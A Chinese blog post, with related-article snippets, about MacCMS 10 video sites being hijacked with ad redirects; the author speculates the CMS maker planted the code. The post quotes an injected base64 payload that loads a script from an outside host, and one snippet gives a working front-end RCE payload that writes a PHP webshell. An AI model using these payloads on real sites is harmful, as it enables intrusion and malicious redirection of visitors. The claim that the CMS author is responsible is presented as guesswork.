苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致

最新推荐文章于 2026-05-17 13:04:47 发布
原创 最新推荐文章于 2026-05-17 13:04:47 发布 · 1w 阅读 · 2
标签
#苹果cms后门 #苹果cms被挂马
本文讲述了作者在使用苹果CMS10建立网站时遇到的挂马问题,分析了可能的原因是CMS作者故意留下的JS漏洞或后门。详细介绍了挂马的表现,如播放视频时加载奇怪字符,疑似DOM XSS攻击。作者怀疑这可能是作者为增加广告收入而进行的跳转。提出了更换CMS系统的解决办法,推荐了海洋CMS、马克斯CMS等替代方案。

最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的.

被挂马表现:

  • 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js
  • 苹果cms后台某处或者采集的资源打印奇怪的字符比如
    {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
    解码其中的Base64的字符串后是
    <script src=https://ad2123.lsjporn.top/upload/aaaa.js></script>
    这也就是传说中的DOM XSS攻击

其实苹果CMS一直以来都是加密了最重要的播放器载入js,而且一直在打开播放页的时候 player.js 会载入一个,//union.maccms.com/html/top10.js 文件,最近作者在这个文件当中加入了广告代码,所以苹果CMS全线跳广告,很多人以为被黑了,其实很多人猜测极大的可能性是作者作妖

最低0.47元/天 解锁文章
漏洞复现】maccms苹果cms 命令执行漏洞
失心少年
11-16 3605
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
苹果CMS网站awd复现
qq_48511129的博客
01-16 4973
D盾扫描无结果 漏洞一:自带大马后门 使用方法 漏洞二:前台rce 进行rce wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A} 进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。 参考 https://blog.csdn.net/m0_37438418/artic
location苹果_苹果cms播放跳转广告挂马问题彻底解决方案
weixin_32601635的博客
12-23 2974
今天早上一觉起来,看到朋友留言,打开电影站后点播放就自动跳转广告,当时第一感觉,是采集站挂马了,毕竟有过经历,然后各系列排查,竟然发现苹果CMS系统挂马,mlgb解决方法很简单,将下面这串代码,复制了然后替换掉系统原先的/static/js/player.js文件var killErrors=function(value){return true};window.onerror=nu...
联想拯救者BIOS隐藏功能一键解锁指南:3分钟开启高级模式,黑苹果安装不再难
最新发布
gitblog_00694的博客
05-17 327
你是否曾为联想拯救者笔记本BIOS中的隐藏选项而烦恼?特别是对于2019/2020款机型,传统的FN+D快捷键进入高级模式的方法已经失效,这让黑苹果安装、性能优化和系统定制变得困难重重。LEGION_Y7000Series_Insyde_Advanced_Settings_Tools正是为解决这一难题而生的专业工具,它能够一键解锁Insyde BIOS的隐藏功能,让你轻松访问CFG LOCK、DV
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 4620
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
苹果CMS漏洞
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
MacCms10潜藏后门分析
Fly_鹏程万里
10-15 8104
影响范围 MacCMS 10 漏洞危害 潜藏后门 攻击类型 潜藏后门 利用条件 在影响范围内的MacCMS CVE编号 无 漏洞概述 苹果CMS程序是一套采用PHP+MYSQL环境下运行的完善而强大的快速建站系统。具有程序体积小、运行速度快等特征,只要普通的虚拟主机就可以完美搭建起来,建站成本非常低。而且仿MVC模板分离,内置标签,自定义函数标签接口,强大的自定义采集功能,只...
苹果CMS V10漏洞深度解析:如何有效防御挂马与跳转劫持
weixin_29207439的博客
02-28 393
本文深度解析苹果CMS V10系统中存在的隐蔽漏洞,该漏洞导致网站被挂马与跳转劫持。攻击者通过参数过滤绕过,将恶意代码植入数据库,造成持久性危害。文章提供了从紧急排查、数据库清洗到长期加固(如严格过滤输入输出、权限最小化)的完整防御方案,帮助站长有效提升网站安全。
苹果cms漏洞POC原理分析与V8 V10挂马解决办法分享
网站安全资讯
01-04 1967
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> ...
苹果cms最新漏洞挂马跳转劫持及清除代码
sexrenge的博客
09-03 7912
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
2020解决苹果CMS漏洞挂马v8 v10最新版本
网站安全专家
01-04 4964
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv...
苹果CMS:通用清理后门排查
一些平时在开发过程中遇到的常见问题,分享给大家
05-21 1640
小白通用清理php后门排查办法
宝塔面板+苹果cms10搭建影视站及采集教程
热门推荐
tantuk的博客
02-16 1万+
宝塔面板+苹果cms10搭建影视站及采集教程
苹果cms8.x 命令执行漏洞本地攻击演示
qq_42383069的博客
11-01 4965
新出道信息安全爱好者,有很多需要学习的地方,愿有一天能追上大佬步伐。 好了,下面进入正题,上半年6月份参加了铁人三项赛,线下web题为Maccms8.x ,当时也是通过团队协作以及百度资源成功破解服务器,现在我搭建了靶机,具体步骤写出来。 1.准备:phpstudy+Maccms8.x 源码 搭建成功后我们先来访问一下 因为Maccms8.x 存在命令执行漏洞,所以我们先点击searc...
MACCMS 远程命令执行漏洞复现(CVE-2017-17733)
lmei1228的博客
09-20 2788
MACCMS是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句----(一句话木马)。(上面这段概述引自vulfocus哈)
苹果cms修复player.js植入弹窗广告方法
winkexin的博客
06-18 2753
某些用户反馈网上下载的苹果CMS程序含有后门,自带的player.js文件被加密了,JS文件内被植入了广告链接,会随机弹出违法广告跳转到违法网址。首先站长建议大家不要在网上随意下载苹果cms程序,苹果CMS原官网早就关闭了,现有的很多自称官方网站都是假冒盗版的网站,程序基本都含有不法后门和广告。下载苹果cms源码程序可以到官网的GitHub地址下载,下载地址:httPs。
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7931
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
本地搭建电影网站:安装部署MacCMS10 2-3
远程穿透的博客
07-25 441
最终,笔者通过查找php.ini文件,发现php.ini文件(该文件并在maccms10文件夹中,而是在phpstudy的php插件文件夹中,本例中使用的php版本为7.4,因此我们需要在路径D:\phpstudy_pro\Extensions\php\php7.4.3nts中寻找php.ini文件)的值显示需要一个tmp文件夹,因此我们需要依照该命令,创建一个tmp文件夹,并赋予其对应权限,才能彻底解决无法登录maccms10后台的问题。这里有的文章指出命令在67行左右,但笔者是在86行找到的。
CMS漏洞(发货100CMS、SHECMS、ZHCMSMACCMS)详解实战
xinyue9966的博客
02-18 1万+
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
苹果cms v8和v10程序漏洞被注入恶意代码修复说明
weixin_46135740的博客
01-16 3239
大家好! 苹果cms v8被大规模注入恶意代码,导致很多人都不敢在用,无论官方怎么修复,更新,都无济于事。到底是什么原因呢! 网上有很多人提到了,黑客是如何入侵网站找到漏洞在植入代码,但是几乎都没说到应该怎么禁止,者预防, 我是怎么发现网站被挂码的,我从搭建电影站开始,一直使用苹果cms,说实在话,简单易懂,好操作,而且带有站群插件,真的是一款相当不错的cms程序, 有一天,我公众号的粉丝给我留...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值